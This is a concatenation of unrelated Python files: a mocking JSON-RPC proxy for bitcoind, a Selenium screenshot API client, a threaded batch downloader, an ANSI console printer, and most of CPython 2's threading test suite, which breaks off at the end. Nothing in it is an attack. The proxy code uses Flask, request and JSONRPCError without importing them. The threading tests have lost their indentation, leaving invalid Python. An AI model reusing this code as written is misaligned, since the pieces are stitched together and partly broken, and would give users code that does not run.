from bitcoin.rpc import RawProxy as BitcoinProxy
from cheroot.wsgi import Server
from cheroot.wsgi import PathInfoDispatcher
import decimal
import flask
import json
import logging
import threading
class DecimalEncoder(json.JSONEncoder):
    """By default json.dumps does not handle Decimals correctly, so we
    override its handling and render them as 8-decimal-place strings.

    Fix: format the Decimal directly instead of round-tripping through
    float, which could misround high-precision amounts.
    """
    def default(self, o):
        if isinstance(o, decimal.Decimal):
            return "{:.8f}".format(o)
        return super(DecimalEncoder, self).default(o)
class BitcoinRpcProxy(object):
    """Forwarding JSON-RPC proxy in front of bitcoind.

    Individual RPC methods can be mocked (canned dict result or callable)
    so tests can inject responses; everything else is proxied through to
    the real daemon via python-bitcoinlib's RawProxy.
    """
    def __init__(self, bitcoind, rpcport=0):
        self.app = Flask("BitcoindProxy")
        self.app.add_url_rule("/", "API entrypoint", self.proxy, methods=['POST'])
        self.rpcport = rpcport      # 0 = let the OS pick a free port
        self.mocks = {}             # method name -> dict result or callable
        self.mock_counts = {}       # method name -> times the mock fired
        self.bitcoind = bitcoind
        self.request_count = 0      # proxied (non-mocked) requests served
    def _handle_request(self, r):
        """Answer one JSON-RPC request dict, via a mock or real bitcoind."""
        brpc = BitcoinProxy(btc_conf_file=self.bitcoind.conf_file)
        method = r['method']
        # If we have set a mock for this method reply with that instead of
        # forwarding the request.
        if method in self.mocks and type(self.mocks[method]) == dict:
            ret = {}
            ret['id'] = r['id']
            ret['error'] = None
            ret['result'] = self.mocks[method]
            self.mock_counts[method] += 1
            return ret
        elif method in self.mocks and callable(self.mocks[method]):
            self.mock_counts[method] += 1
            return self.mocks[method](r)
        try:
            reply = {
                "result": brpc._call(r['method'], *r['params']),
                "error": None,
                "id": r['id']
            }
        except JSONRPCError as e:
            reply = {
                "error": e.error,
                "code": -32603,
                "id": r['id']
            }
        self.request_count += 1
        return reply
    def proxy(self):
        """Flask endpoint: handle a single request or a JSON-RPC batch."""
        r = json.loads(request.data.decode('ASCII'))
        if isinstance(r, list):
            reply = [self._handle_request(subreq) for subreq in r]
        else:
            reply = self._handle_request(r)
        response = flask.Response(json.dumps(reply, cls=DecimalEncoder))
        response.headers['Content-Type'] = 'application/json'
        return response
    def start(self):
        """Serve on a daemon thread; blocks until the port is bound."""
        d = PathInfoDispatcher({'/': self.app})
        self.server = Server(('0.0.0.0', self.rpcport), d)
        self.proxy_thread = threading.Thread(target=self.server.start)
        self.proxy_thread.daemon = True
        self.proxy_thread.start()
        # Now that bitcoind is running on the real rpcport, let's tell all
        # future callers to talk to the proxyport. We use the bind_addr as a
        # signal that the port is bound and accepting connections.
        # NOTE(review): busy-wait spin; a short sleep per iteration would
        # avoid pegging a core during startup.
        while self.server.bind_addr[1] == 0:
            pass
        self.rpcport = self.server.bind_addr[1]
        logging.debug("BitcoinRpcProxy proxying incoming port {} to {}".format(self.rpcport, self.bitcoind.rpcport))
    def stop(self):
        """Shut the server down and join the serving thread."""
        self.server.stop()
        self.proxy_thread.join()
        logging.debug("BitcoinRpcProxy shut down after processing {} requests".format(self.request_count))
    def mock_rpc(self, method, response=None):
        """Mock the response to a future RPC call of @method

        The response can either be a dict with the full JSON-RPC response, or a
        function that returns such a response. If the response is None the mock
        is removed and future calls will be passed through to bitcoind again.
        """
        if response is not None:
            self.mocks[method] = response
            self.mock_counts[method] = 0
        elif method in self.mocks:
            del self.mocks[method]
|
Snapshot.py | from . import globals as G
import requests, sys, time, os, threading
class Snapshot:
    """
    Represents a snapshot for selenium tests
    :param hash: the hash for this image, returned by rest api when taking a screenshot
    :param test: an AutomatedTest object that represents a test currently running
    """
    def __init__(self, hash, test):
        self.hash = hash
        self.testId = test.testId
        # populate self.info immediately via the REST API
        self.getInfo()
    def getInfo(self):
        """
        Calls out to api to get updated info for this snapshot
        :returns: a python dict object with all of the info for this Snapshot
        """
        self.info = requests.get(G.api + self.testId + '/snapshots/' + self.hash, auth=(G.username, G.authkey)).json()
        return self.info
    def setDescription(self, description):
        """
        Sets the description for this snapshot

        NOTE(review): unlike getInfo(), this stores the raw Response object
        in self.info (no .json()); callers expecting a dict after calling
        setDescription will break — confirm whether .json() was intended.
        """
        url = G.api + self.testId + '/snapshots/' + self.hash
        self.info = requests.put(url, auth=(G.username, G.authkey), data={'description':description})
    def saveLocally(self, location):
        """
        Async method to download this snapshot to the location given
        :param location: a string with the location and filename for the image. Should have a .png extension
        """
        t = threading.Thread(target=Snapshot.__saveSnapshot, args=(self, location))
        t.start()
    def __saveSnapshot(self, location):
        # Poll up to ~15s for the image to become available, then stream it
        # to disk in 128-byte chunks.
        url = self.getInfo()['image']
        r = requests.get(url, stream=True)
        timeout = 15
        iteration = 1
        while (iteration < timeout) and (r.status_code != 200):
            r = requests.get(url, stream=True)
            iteration += 1
            time.sleep(1)
        if iteration < timeout:
            path = os.path.split(location)[0]
            # NOTE(review): os.mkdir creates only the final path component;
            # os.makedirs may be wanted for nested directories — confirm.
            if not os.path.exists(path):
                os.mkdir(path)
            with open(location, 'wb') as f:
                for chunk in r.iter_content(chunk_size=128):
                    f.write(chunk)
|
downloader.py | import os
import re
import threading
import time
import urllib
from urllib.parse import urlparse
import requests
class Downloader:
    """Batch file downloader driven by a PySimpleGUI-style window.

    Fixes vs. the original:
    * url_lists / start_index / default_dldir / window were CLASS attributes,
      so every instance appended into one shared URL list; they are now
      instance attributes assigned in __init__.
    * ``lst.strip()`` discarded its result, so indented URLs were silently
      skipped; the stripped value is now used.
    * ``re.sub`` sanitizing the file name discarded its result; it is now
      applied (to the base name only, so directory separators survive).
    * start() recursed once per URL, risking RecursionError on long lists;
      rewritten as a loop.
    """
    def __init__(self, window, txt, default_dldir, start):
        self.window = window
        self.default_dldir = default_dldir
        self.start_index = start
        self.url_lists = []
        for line in txt.splitlines():
            line = line.strip()
            if line.find(r'http:') == 0 or line.find(r'https:') == 0:
                self.url_lists.append(line)
        # create a fresh downloaderN directory to write into
        diridx = 0
        while True:
            diridx += 1
            dlpath = f'{self.default_dldir}{os.sep}downloader' + str(diridx)
            if not os.path.exists(dlpath):
                os.makedirs(dlpath, exist_ok=True)
                self.default_dldir = dlpath
                break
    def create_thread(self):
        """Kick off the download loop on a daemon thread; disable the button."""
        self.window['_DOWNLOAD_ALL_'].update(disabled=True)
        threading.Thread(target=self.start, args=(), daemon=True).start()
    def start(self):
        """Download every queued URL, updating both progress bars."""
        while self.start_index < len(self.url_lists):
            self.download_file(self.url_lists[self.start_index])
            self.start_index += 1
            val = (self.start_index / len(self.url_lists)) * 100
            self.show_total_progress(val)
            self.show_progress(0)
            time.sleep(0.2)
        self.show_total_progress(100)
        self.window['_DOWNLOAD_ALL_'].update(disabled=False)
    def show_progress(self, val):
        # per-file progress bar (0-100)
        self.window['_PROGRESS_BAR_'].UpdateBar(val)
    def show_total_progress(self, val):
        # whole-batch progress bar (0-100)
        self.window['_TOTAL_PROGRESS_BAR_'].UpdateBar(val)
    def download_file(self, file_url):
        """Stream one URL to disk, reporting progress when the size is known."""
        parse_url = urlparse(file_url)
        fname = urllib.parse.unquote(parse_url.path[parse_url.path.rfind('/') + 1:])
        fname = os.path.basename(fname)
        # strip characters that are illegal in file names
        fname = re.sub(r'[\\/:*?"<>|]+', '', fname)
        file_name = self.default_dldir + os.sep + fname
        headers = requests.head(file_url).headers
        try:
            total_length = int(headers["content-length"])
        except Exception as e:
            print(e)
            total_length = None
        response = requests.get(file_url, stream=True)
        try:
            with open(file_name, "wb") as f:
                if total_length is None:
                    # unknown size: no per-file progress possible
                    f.write(response.content)
                else:
                    dl = 0
                    for data in response.iter_content(chunk_size=4096):
                        dl += len(data)
                        f.write(data)
                        self.show_progress(dl / total_length * 100)
        except FileNotFoundError as e:
            print("FileNotFoundError", e)
            print(file_url)
            print(file_name)
        except Exception as e:
            print(e)
|
cuteprint.py | #!/usr/bin/env python
# encoding: utf-8
# This script is compatible with both Python 2 and 3
import sys
import threading
import time
class PrettyPrinter :
    """ANSI-colorized console output helpers plus a dotted progress spinner."""
    # Colorized Output Functions
    def green(self, s):
        return '\033[1;32m{}\033[0m'.format(s)
    def red(self, s):
        return '\033[1;31m{}\033[0m'.format(s)
    def blue(self, s):
        return '\033[1;34m{}\033[0m'.format(s)
    def pink(self, s):
        return '\033[1;35m{}\033[0m'.format(s)
    def white(self, s):
        return '\033[1;37m{}\033[0m'.format(s)
    # Pretty-Print Contextual Functions
    def custom_print(self, string, color, symbol, end, elapsed_time=None, replace_line=False):
        # color is one of the methods above; symbol is the "[x]" prefix tag.
        if elapsed_time:
            to_print = '{} {} {} {}'.format(color(symbol), str(string), 'in {} seconds'.format(elapsed_time), end)
        else:
            to_print = '{} {} {}'.format(color(symbol), str(string), end)
        if replace_line :
            # \r rewinds the cursor so the new text overwrites the old line
            to_print = '\r{}'.format(to_print)
        print(to_print)
    def print_good(self, s, end='\n', replace_line=False):
        self.custom_print(string=s, color=self.green, symbol='[+]', replace_line=replace_line, end=end)
    def print_bad(self, s, end='\n', replace_line=False):
        self.custom_print(string=s, color=self.red, symbol='[-]', replace_line=replace_line, end=end)
    def print_info(self, s, end='\n', replace_line=False, elapsed_time=None):
        self.custom_print(string=s, color=self.blue, symbol='[!]', replace_line=replace_line, elapsed_time=elapsed_time, end=end)
    def print_question(self, s, end='\n', replace_line=False):
        self.custom_print(string=s, color=self.white, symbol='[?]', replace_line=replace_line, end=end)
    def print_separator(self, length=150, suffix=None, separator='.', end='\n'):
        # With a suffix the dots are shortened so the total stays `length` wide.
        if suffix != None:
            final_len = length-len(suffix)-1
            print("{} {}".format(suffix, separator*final_len+end))
        else:
            print(separator*length+end)
    def print_title(self, title, top='=', bottom='=', left='>', right='<', caps=True):
        # Boxed, optionally upper-cased section title.
        print('\n')
        print(self.white(top*(len(title)+4)))
        if caps :
            print(self.white("{} {} {} ".format(left,title.upper(),right)))
        else:
            print(self.white("{} {} {} ".format(left,title,right)))
        print(self.white(bottom*(len(title)+4))+'\n\n')
    def print_blank(self):
        print('\n')
    # Progress Dotted-Bar Functions
    def progress(self, task, enable_dots, char):
        # Runs on a worker thread; spins until stop_progress() sets the
        # thread's `load` attribute to False.
        start_time = time.time()
        t = threading.currentThread()
        s = char
        self.print_info(task)
        while getattr(t, "load", True):
            if enable_dots:
                sys.stdout.write(s)
                sys.stdout.flush()
            time.sleep(1)
        self.print_info("Task << {} >> : Done".format(task), replace_line=True, elapsed_time=(time.time() - start_time), end="\n")
    def start_progress(self, task, enable_dots=True, char='.'):
        """Start the spinner thread and return it (pass to stop_progress)."""
        t = threading.Thread(target=self.progress, args=(task,enable_dots,char))
        t.daemon = True
        t.start()
        return t
    def stop_progress(self, loading_thread):
        """Signal the spinner thread to finish and wait for it."""
        loading_thread.load = False
        loading_thread.join()
if __name__ == '__main__':
    # PrettyPrinter Init
    p = PrettyPrinter()
    # Contextual Function Demo
    p.print_title("Contextual Pretty Print Functions Demo")
    p.print_good("This is Good")
    p.print_bad("This is Bad")
    p.print_info("This is an Information")
    p.print_question("Is this a Question ?")
    p.print_separator(length=100, separator="~")
    # Simple Loading Progress Bar Example
    p.print_title("Simple Loading Progress Bar Demo")
    t = p.start_progress(task="Loading templates ...")
    time.sleep(6)
    p.stop_progress(t)
    p.print_separator(length=100, separator="~")
    # Threaded Loading Examples (enable_dots set to False for better output)
    # Fix: threadedExample was referenced but never defined, so this demo
    # crashed with NameError; define it here.
    def threadedExample(task, duration):
        """Run one dotless progress bar for `duration` seconds."""
        bar = p.start_progress(task=task, enable_dots=False)
        time.sleep(duration)
        p.stop_progress(bar)
    p.print_title("Threaded Loading Demo")
    t1 = threading.Thread(target=threadedExample, args=("thread1.com", 3))
    t2 = threading.Thread(target=threadedExample, args=("thread2.com", 5))
    t1.start()
    t2.start()
|
test_threading.py | # Very rudimentary test of threading module
import test.test_support
from test.test_support import verbose
from test.script_helper import assert_python_ok
import random
import re
import sys
thread = test.test_support.import_module('thread')
threading = test.test_support.import_module('threading')
import time
import unittest
import weakref
import os
import subprocess
from test import lock_tests
# A trivial mutable counter.
class Counter(object):
    """A trivial mutable counter (not thread-safe on its own; callers must
    guard it with a lock when shared across threads)."""
    def __init__(self):
        self.value = 0
    def inc(self):
        self.value = self.value + 1
    def dec(self):
        self.value = self.value - 1
    def get(self):
        return self.value
class TestThread(threading.Thread):
    # Worker used by test_various_ops: acquires the semaphore (capacity 3),
    # bumps the shared running-count, sleeps a random sliver, then decrements,
    # asserting the count never exceeds 3 nor goes negative.
    def __init__(self, name, testcase, sema, mutex, nrunning):
        threading.Thread.__init__(self, name=name)
        self.testcase = testcase
        self.sema = sema          # BoundedSemaphore limiting concurrency
        self.mutex = mutex        # guards nrunning
        self.nrunning = nrunning  # shared Counter of currently-running tasks
    def run(self):
        delay = random.random() / 10000.0
        if verbose:
            print 'task %s will run for %.1f usec' % (
                self.name, delay * 1e6)
        with self.sema:
            with self.mutex:
                self.nrunning.inc()
                if verbose:
                    print self.nrunning.get(), 'tasks are running'
                self.testcase.assertTrue(self.nrunning.get() <= 3)
            time.sleep(delay)
            if verbose:
                print 'task', self.name, 'done'
            with self.mutex:
                self.nrunning.dec()
                self.testcase.assertTrue(self.nrunning.get() >= 0)
                if verbose:
                    print '%s is finished. %d tasks are running' % (
                        self.name, self.nrunning.get())
class BaseTestCase(unittest.TestCase):
    # Shared setup/teardown: snapshot the live-thread state before each test
    # and ensure no stray threads or child processes survive it.
    def setUp(self):
        self._threads = test.test_support.threading_setup()
    def tearDown(self):
        test.test_support.threading_cleanup(*self._threads)
        test.test_support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertEqual(t.ident, None)
self.assertTrue(re.match('<TestThread\(.*, initial\)>', repr(t)))
t.start()
if verbose:
print 'waiting for all tasks to complete'
for t in threads:
t.join(NUMTASKS)
self.assertTrue(not t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertFalse(t.ident is None)
self.assertTrue(re.match('<TestThread\(.*, \w+ -?\d+\)>', repr(t)))
if verbose:
print 'all tasks done'
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertFalse(threading.currentThread().ident is None)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
thread.start_new_thread(f, ())
done.wait()
self.assertFalse(ident[0] is None)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256kB)
def test_various_ops_small_stack(self):
if verbose:
print 'with 256kB thread stack size...'
try:
threading.stack_size(262144)
except thread.error:
if verbose:
print 'platform does not support changing thread stack size'
return
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1MB)
def test_various_ops_large_stack(self):
if verbose:
print 'with 1MB thread stack size...'
try:
threading.stack_size(0x100000)
except thread.error:
if verbose:
print 'platform does not support changing thread stack size'
return
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
tid = thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
try:
import ctypes
except ImportError:
if verbose:
print "test_PyThreadState_SetAsyncExc can't import ctypes"
return # can't do anything
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = thread.get_ident()
try:
result = set_async_exc(ctypes.c_long(tid), exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = thread.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print " started worker thread"
# Try a thread id that doesn't make sense.
if verbose:
print " trying nonsensical thread id"
result = set_async_exc(ctypes.c_long(-1), exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print " waiting for worker thread to get started"
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print " verifying worker hasn't exited"
self.assertTrue(not t.finished)
if verbose:
print " attempting to raise asynch exception in worker"
result = set_async_exc(ctypes.c_long(t.id), exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print " waiting for worker to say it caught the exception"
worker_saw_exception.wait(timeout=10)
self.assertTrue(t.finished)
if verbose:
print " all OK -- joining worker"
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise thread.error()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(thread.error, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
def test_finalize_runnning_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
try:
import ctypes
except ImportError:
if verbose:
print("test_finalize_with_runnning_thread can't import ctypes")
return # can't do anything
rc = subprocess.call([sys.executable, "-c", """if 1:
import ctypes, sys, time, thread
# This lock is used as a simple event variable.
ready = thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
"""])
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print 'program blocked; aborting'
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
"""],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
stdout, stderr = p.communicate()
rc = p.returncode
self.assertFalse(rc == 2, "interpreted was blocked")
self.assertTrue(rc == 0,
"Unexpected error: " + repr(stderr))
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
p = subprocess.Popen([sys.executable, "-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print "Woke up, sleep function is:", sleep
threading.Thread(target=child).start()
raise SystemExit
"""],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
stdout, stderr = p.communicate()
self.assertEqual(stdout.strip(),
"Woke up, sleep function is: <built-in function sleep>")
stderr = re.sub(r"^\[\d+ refs\]", "", stderr, re.MULTILINE).strip()
self.assertEqual(stderr, "")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getcheckinterval()
try:
for i in xrange(1, 100):
# Try a couple times at each thread-switching interval
# to get more interleavings.
sys.setcheckinterval(i // 5)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setcheckinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertEqual(None, weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertEqual(None, weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
# Issue #14308: a dummy thread in the active list doesn't mess up
# the after-fork mechanism.
code = """if 1:
import thread, threading, os, time
def background_thread(evt):
# Creates and registers the _DummyThread instance
threading.current_thread()
evt.set()
time.sleep(10)
evt = threading.Event()
thread.start_new_thread(background_thread, (evt,))
evt.wait()
assert threading.active_count() == 2, threading.active_count()
if os.fork() == 0:
assert threading.active_count() == 1, threading.active_count()
os._exit(0)
else:
os.wait()
"""
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, '')
self.assertEqual(err, '')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
# Try hard to trigger #18418: is_alive() could sometimes be True on
# threads that vanished after a fork.
old_interval = sys.getcheckinterval()
# Make the bug more likely to manifest.
sys.setcheckinterval(10)
try:
for i in range(20):
t = threading.Thread(target=lambda: None)
t.start()
pid = os.fork()
if pid == 0:
os._exit(1 if t.is_alive() else 0)
else:
t.join()
pid, status = os.waitpid(pid, 0)
self.assertEqual(0, status)
finally:
sys.setcheckinterval(old_interval)
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should raise ValueError if released too often.
for limit in range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
threads = [threading.Thread(target=bs.release)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertRaises(ValueError, bs.release)
class ThreadJoinOnShutdown(BaseTestCase):
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('freebsd4', 'freebsd5', 'freebsd6', 'netbsd5',
'os2emx')
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print 'end of thread'
\n""" + script
p = subprocess.Popen([sys.executable, "-c", script], stdout=subprocess.PIPE)
rc = p.wait()
data = p.stdout.read().replace('\r', '')
p.stdout.close()
self.assertEqual(data, "end of main\nend of thread\n")
self.assertFalse(rc == 2, "interpreter was blocked")
self.assertTrue(rc == 0, "Unexpected error")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print 'end of main'
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print 'end of main'
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print 'end of main'
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
def assertScriptHasOutput(self, script, expected_output):
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE)
rc = p.wait()
data = p.stdout.read().decode().replace('\r', '')
self.assertEqual(rc, 0, "Unexpected error")
self.assertEqual(data, expected_output)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_joining_across_fork_in_worker_thread(self):
# There used to be a possible deadlock when forking from a child
# thread. See http://bugs.python.org/issue6643.
# The script takes the following steps:
# - The main thread in the parent process starts a new thread and then
# tries to join it.
# - The join operation acquires the Lock inside the thread's _block
# Condition. (See threading.py:Thread.join().)
# - We stub out the acquire method on the condition to force it to wait
# until the child thread forks. (See LOCK ACQUIRED HERE)
# - The child thread forks. (See LOCK HELD and WORKER THREAD FORKS
# HERE)
# - The main thread of the parent process enters Condition.wait(),
# which releases the lock on the child thread.
# - The child process returns. Without the necessary fix, when the
# main thread of the child process (which used to be the child thread
# in the parent process) attempts to exit, it will try to acquire the
# lock in the Thread._block Condition object and hang, because the
# lock was held across the fork.
script = """if 1:
import os, time, threading
finish_join = False
start_fork = False
def worker():
# Wait until this thread's lock is acquired before forking to
# create the deadlock.
global finish_join
while not start_fork:
time.sleep(0.01)
# LOCK HELD: Main thread holds lock across this call.
childpid = os.fork()
finish_join = True
if childpid != 0:
# Parent process just waits for child.
os.waitpid(childpid, 0)
# Child process should just return.
w = threading.Thread(target=worker)
# Stub out the private condition variable's lock acquire method.
# This acquires the lock and then waits until the child has forked
# before returning, which will release the lock soon after. If
# someone else tries to fix this test case by acquiring this lock
# before forking instead of resetting it, the test case will
# deadlock when it shouldn't.
condition = w._block
orig_acquire = condition.acquire
call_count_lock = threading.Lock()
call_count = 0
def my_acquire():
global call_count
global start_fork
orig_acquire() # LOCK ACQUIRED HERE
start_fork = True
if call_count == 0:
while not finish_join:
time.sleep(0.01) # WORKER THREAD FORKS HERE
with call_count_lock:
call_count += 1
condition.acquire = my_acquire
w.start()
w.join()
print('end of main')
"""
self.assertScriptHasOutput(script, "end of main\n")
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_5_clear_waiter_locks_to_avoid_crash(self):
# Check that a spawned thread that forks doesn't segfault on certain
# platforms, namely OS X. This used to happen if there was a waiter
# lock in the thread's condition variable's waiters list. Even though
# we know the lock will be held across the fork, it is not safe to
# release locks held across forks on all platforms, so releasing the
# waiter lock caused a segfault on OS X. Furthermore, since locks on
# OS X are (as of this writing) implemented with a mutex + condition
# variable instead of a semaphore, while we know that the Python-level
# lock will be acquired, we can't know if the internal mutex will be
# acquired at the time of the fork.
script = """if True:
import os, time, threading
start_fork = False
def worker():
# Wait until the main thread has attempted to join this thread
# before continuing.
while not start_fork:
time.sleep(0.01)
childpid = os.fork()
if childpid != 0:
# Parent process just waits for child.
(cpid, rc) = os.waitpid(childpid, 0)
assert cpid == childpid
assert rc == 0
print('end of worker thread')
else:
# Child process should just return.
pass
w = threading.Thread(target=worker)
# Stub out the private condition variable's _release_save method.
# This releases the condition's lock and flips the global that
# causes the worker to fork. At this point, the problematic waiter
# lock has been acquired once by the waiter and has been put onto
# the waiters list.
condition = w._block
orig_release_save = condition._release_save
def my_release_save():
global start_fork
orig_release_save()
# Waiter lock held here, condition lock released.
start_fork = True
condition._release_save = my_release_save
w.start()
w.join()
print('end of main thread')
"""
output = "end of worker thread\nend of main thread\n"
self.assertScriptHasOutput(script, output)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock in a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process and wait it
pid = os.fork()
if pid > 0:
os.waitpid(pid, 0)
else:
os._exit(0)
# start a bunch of threads that will fork() child processes
threads = []
for i in range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
for t in threads:
t.join()
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
def test_joining_current_thread(self):
current_thread = threading.current_thread()
